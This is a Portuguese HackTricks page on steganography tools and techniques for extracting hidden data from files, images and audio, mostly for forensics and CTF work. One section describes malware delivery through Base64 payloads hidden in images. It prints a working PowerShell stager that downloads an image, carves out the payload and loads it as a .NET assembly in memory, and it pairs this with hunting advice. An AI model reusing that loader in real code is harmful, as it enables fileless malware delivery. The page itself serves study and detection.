Stego Tricks
Reading time: 9 minutes
tip
Aprenda e pratique Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
 - Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
 - Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
 
Extraindo dados de arquivos
Binwalk
Uma ferramenta para procurar em arquivos binários por arquivos e dados ocultos embutidos. É instalada via apt e seu código-fonte está disponível no GitHub.
binwalk file # Displays the embedded data
binwalk -e file # Extracts the data
binwalk --dd ".*" file # Extracts all data
Foremost
Recupera arquivos com base em seus cabeçalhos e rodapés, útil para imagens png. Instalado via apt com seu código-fonte em GitHub.
foremost -i file # Extracts data
Exiftool
Ajuda a visualizar metadados de arquivos, disponível aqui.
exiftool file # Shows the metadata
Exiv2
Semelhante ao exiftool, para visualização de metadados. Instalável via apt, código-fonte em GitHub, e possui um official website.
exiv2 file # Shows the metadata
Arquivo
Identifique o tipo de arquivo com o qual você está lidando.
Strings
Extrai strings legíveis de arquivos, usando várias configurações de codificação para filtrar a saída.
strings -n 6 file # Extracts strings with a minimum length of 6
strings -n 6 file | head -n 20 # First 20 strings
strings -n 6 file | tail -n 20 # Last 20 strings
strings -e s -n 6 file # 7bit strings
strings -e S -n 6 file # 8bit strings
strings -e l -n 6 file # 16bit strings (little-endian)
strings -e b -n 6 file # 16bit strings (big-endian)
strings -e L -n 6 file # 32bit strings (little-endian)
strings -e B -n 6 file # 32bit strings (big-endian)
Comparison (cmp)
Útil para comparar um arquivo modificado com sua versão original encontrada online.
cmp original.jpg stego.jpg -b -l
Extraindo Dados Ocultos em Texto
Dados Ocultos em Espaços
Caracteres invisíveis em espaços aparentemente vazios podem ocultar informação. Para extrair esses dados, visite https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder.
Extraindo Dados de Imagens
Identificando Detalhes da Imagem com GraphicMagick
GraphicMagick serve para determinar tipos de arquivos de imagem e identificar possíveis corrupções. Execute o comando abaixo para inspecionar uma imagem:
./magick identify -verbose stego.jpg
Para tentar reparar uma imagem danificada, adicionar um comentário de metadados pode ajudar:
./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg
Steghide para Ocultação de Dados
Steghide facilita esconder dados dentro de JPEG, BMP, WAV, and AU files, sendo capaz de embedar e extrair dados encriptados. A instalação é simples usando apt, e seu source code is available on GitHub.
Comandos:
steghide info filerevela se um arquivo contém dados ocultos.steghide extract -sf file [--passphrase password]extrai os dados ocultos, senha opcional.
Para extração via web, visite este site.
Ataque de força bruta com Stegcracker:
- Para tentar quebrar a senha do Steghide, use stegcracker da seguinte forma:
 
stegcracker <file> [<wordlist>]
zsteg para arquivos PNG e BMP
zsteg é especializado em descobrir dados ocultos em arquivos PNG e BMP. A instalação é feita via gem install zsteg, com seu código-fonte no GitHub.
Comandos:
zsteg -a fileaplica todos os métodos de detecção em um arquivo.zsteg -E fileespecifica um payload para extração de dados.
StegoVeritas e Stegsolve
stegoVeritas verifica metadados, realiza transformações de imagem e aplica LSB brute forcing entre outras funcionalidades. Use stegoveritas.py -h para a lista completa de opções e stegoveritas.py stego.jpg para executar todas as verificações.
Stegsolve aplica vários filtros de cor para revelar textos ou mensagens ocultas em imagens. Está disponível no GitHub.
FFT para Detecção de Conteúdo Oculto
Técnicas de Fast Fourier Transform (FFT) podem revelar conteúdo oculto em imagens. Recursos úteis incluem:
Stegpy para arquivos de áudio e imagem
Stegpy permite embutir informações em arquivos de imagem e áudio, suportando formatos como PNG, BMP, GIF, WebP e WAV. Está disponível no GitHub.
Pngcheck para Análise de Arquivos PNG
Para analisar arquivos PNG ou validar sua autenticidade, use:
apt-get install pngcheck
pngcheck stego.png
Ferramentas adicionais para Image Analysis
Para exploração adicional, considere visitar:
Payloads Base64 delimitados por marcadores escondidos em imagens (malware delivery)
Commodity loaders cada vez mais escondem payloads codificados em Base64 como texto simples dentro de imagens que, de outra forma, são válidas (frequentemente GIF/PNG). Em vez do pixel-level LSB, o payload é delimitado por unique start/end marker strings embutidas no texto/metadata do arquivo. Um stager PowerShell então:
- Faz o download da imagem via HTTP(S)
 - Localiza as marker strings (exemplos observados: <<sudo_png>> … <<sudo_odt>>)
 - Extrai o texto entre os marcadores e decodifica Base64 para bytes
 - Carrega o .NET assembly em memória e invoca um entry method conhecido (nenhum arquivo é escrito no disco)
 
Trecho mínimo PowerShell de carving/loading snippet
$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}
Notas
- Isto se enquadra no ATT&CK T1027.003 (steganography). Cadeias de marcador variam entre campanhas.
 - Hunting: escaneie imagens baixadas em busca de delimitadores conhecidos; marque 
PowerShellusandoDownloadStringseguido deFromBase64String. 
Veja também exemplos de entrega via phishing e o fluxo completo de invocação in-memory aqui:
Extraindo Dados de Áudios
Audio steganography oferece um método único para ocultar informações em arquivos de som. Diferentes ferramentas são utilizadas para embutir ou recuperar conteúdo oculto.
Steghide (JPEG, BMP, WAV, AU)
Steghide é uma ferramenta versátil projetada para ocultar dados em arquivos JPEG, BMP, WAV e AU. Instruções detalhadas estão disponíveis na stego tricks documentation.
Stegpy (PNG, BMP, GIF, WebP, WAV)
Esta ferramenta é compatível com vários formatos, incluindo PNG, BMP, GIF, WebP e WAV. Para mais informações, consulte Stegpy's section.
ffmpeg
ffmpeg é crucial para avaliar a integridade de arquivos de áudio, destacando informações detalhadas e identificando quaisquer discrepâncias.
ffmpeg -v info -i stego.mp3 -f null -
WavSteg (WAV)
WavSteg se destaca em ocultar e extrair dados em arquivos WAV usando a técnica LSB (least significant bit). Está disponível no GitHub. Comandos incluem:
python3 WavSteg.py -r -b 1 -s soundfile -o outputfile
python3 WavSteg.py -r -b 2 -s soundfile -o outputfile
Deepsound
Deepsound permite a criptografia e a detecção de informações dentro de arquivos de som usando AES-256. Pode ser baixado de the official page.
Sonic Visualizer
Uma ferramenta indispensável para inspeção visual e analítica de arquivos de áudio, Sonic Visualizer pode revelar elementos ocultos indetectáveis por outros meios. Visite o official website para mais.
DTMF Tones - Dial Tones
A detecção de tons DTMF em arquivos de áudio pode ser feita por ferramentas online como this DTMF detector e DialABC.
Outras Técnicas
Binary Length SQRT - QR Code
Dados binários cujo comprimento é um quadrado perfeito podem representar um QR code. Use este trecho para verificar:
import math
math.sqrt(2500) #50
Para conversão de binário para imagem, confira dcode. Para ler códigos QR, use this online barcode reader.
Tradução de Braille
Para traduzir Braille, o Branah Braille Translator é um excelente recurso.
Referências
- https://0xrick.github.io/lists/stego/
 - https://github.com/DominicBreuker/stego-toolkit
 - Unit 42 – PhantomVAI Loader Delivers a Range of Infostealers
 - MITRE ATT&CK – Steganography (T1027.003)
 
tip
Aprenda e pratique Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
 - Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
 - Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
 
HackTricks